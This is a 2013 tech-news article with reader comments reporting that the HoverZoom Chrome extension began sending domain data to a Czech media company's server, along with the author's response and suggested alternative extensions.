Beware: HoverZoom extension for Chrome turns evil - gHacks Tech News

Beware: HoverZoom extension for Chrome turns evil

It should not happen that extensions get modified in key aspects without existing users being made aware of those changes.

We have already seen how companies take advantage of Mozilla's add-on repository by approaching add-on developers to purchase their extensions or have them modify it to gather data or implement money making schemes into the extensions.

Today it became known that the author of the popular HoverZoom extension for the Google Chrome browser also implemented "features" into the extension that many users will certainly consider unethical if only they knew about them.

A user of the extension noticed that it was acting up when connections to Github were made and after additional users reported the same issue, one user wanted to know why Hoverzoom needed to POST to a Czech media company server (http://advisormedia.cz/).

hoverzoom

The author's reply confirmed that he agreed to enter a partnership with the company. According to his post, the script is detecting unused domain names and posts those information to the media company's site.

This script was added after a partnership has been established with a media consulting company. It detects unused domain names and posts the results to their site. The collected data is strictly anonymous.

HoverZoom is a popular extension for the Chrome browser. The Chrome Web Store lists more than 761,000 users and reviews of it have been outright positive until now. The most recent reviews on the other hand highlight the issue and rated the extension with one star.

What needs to be mentioned in this regard is that the new version, the one with the domain checking, was accepted into the Web Store which should be a concern for all users of the store. Is it the only extension for Chrome that does that, or did the Czech company contact other extension developers as well to get them to add a similar script to their extensions?

A free fork of the extension has been created by a Reddit user. Hover Free is basically the same extension, but without the domain checking part or other features the original author may have implemented into it lately.

Update: Hover Free is no longer available. It is not clear why that is the case.

We can learn a couple of things from this though. First, companies not only exploit the Mozilla Store but also the Chrome Web Store by making monetary offers to extension developers, and second, the scripts that get integrated into these extensions do not seem to be detected by reviews. This is not very reassuring though as there is not really anything that regular users can do to detect this in their extensions.

Update: The author of the original HoverZoom extension has implemented a switch in the settings which blocks anonymous usage statistics from being sent. There is no direct alternative for Chrome, but you can use the userscript Mouseover Popup Image Viewer instead which offers a similar feature set.





  • We need your help

    Advertising revenue is falling fast across the Internet, and independently-run sites like Ghacks are hit hardest by it. The advertising model in its current form is coming to an end, and we have to find other ways to continue operating this site.

    We are committed to keeping our content free and independent, which means no paywalls, no sponsored posts, no annoying ad formats (video ads) or subscription fees.

    If you like our content, and would like to help, please consider making a contribution:

    Comments

    1. trabbel said on March 5, 2013 at 4:17 am
      Reply

      hey martin, many thanks for letting us know! :)

    2. funix said on March 5, 2013 at 4:37 am
      Reply

      Thanks for the information and bringing up the fork for exchange. Without that alternative may have said “meh, whatever”.

    3. happycommenter said on March 5, 2013 at 8:06 am
      Reply

      Interesting they don’t have this problem with Internet Explorer.

    4. Raton said on March 5, 2013 at 9:45 am
      Reply
      1. Martin Brinkmann said on March 5, 2013 at 10:05 am
        Reply

        Thanks, have updated the article.

    5. blue_bsod said on March 5, 2013 at 11:05 am
      Reply

      @happycommenter: When it comes to free Add-on’s Firefox and Chrome come to mind first. MSIE had very few Add-ons, and most were either junk, trials, or required payment to use. Even with the current MSIE 10, there is only less than two handfuls of available free Add-on’s. Whereas the market goes towards Firefox who was released with Add-on’s, and then later Chrome. Of course MSIE doesn’t have this problem because they have less than 0.0001% of the market when it comes to Add-on’s. Advertisers would be stupid to go after Add-on’s for a browser with only 0.0001% of the market. It doesn’t make MSIE better because of that. What MSIE lacks in every department, Firefox and Chrome can make-up and exceed your expectations using Add-ons. MSIE is full of holes, can be exploited, has poor security, slow, resource hog, crippled and more…

    6. trekker said on March 5, 2013 at 2:00 pm
      Reply

      ***Thank you*** for this useful alert, Martin!

      Pls, keep posting
      about suspicious FF addons, too
      …as you’ve done in the past.

      I wish,
      a user-friendly detection mechanism or guidelines
      existed to detect “rogue” addon behavior,
      (An easy way for those of us who are not techie users).

      Meanwhile, I rely on Ghacks.

    7. Jojo said on March 5, 2013 at 3:13 pm
      Reply

      There is a nice Android monitor app I run that shows you all the changes made to an app when it is updated.

      Of course, if the developer doesn’t publish the changes, then the app won’t show anything.
      ==========
      Description

      Are you tired of going through every updated application on the Play Store to see what the developer has changed? Changelog Droid solves this problem by fetching all the information directly from the Play Store after or before you update them.

      https://play.google.com/store/apps/details?id=com.cypressworks.changelogviewer&feature=nav_result#

      1. Martin Brinkmann said on March 5, 2013 at 3:15 pm
        Reply

        I reviewed this or a similar application some time ago, can’t remember right now which it was. It would probably not have helped in this case though.

    8. batman said on March 9, 2013 at 9:23 am
      Reply

      I love how developers like this, build on a FREE browser, but somehow feel that they should make money.

    9. blue_bsod said on April 5, 2013 at 2:45 pm
      Reply

      Photo Zoom for Facebook is better and lists over 4M users. Has extensions for Chrome, Firefox, and Safari, and has no ads, no tracking, no silly 3rd party scripts of off site extensions.

      http://www.regisgaughan.com/fbphotozoom/

    10. author said on October 18, 2013 at 3:49 pm
      Reply

      Hover Free is not available.

      1. Martin Brinkmann said on October 18, 2013 at 6:15 pm
        Reply

        Thanks for letting me know about that. I have updated the article.

    11. gorankx said on February 14, 2014 at 5:06 pm
      Reply

      There is a Imagus, which is also recommended by Hower free

    Leave a Reply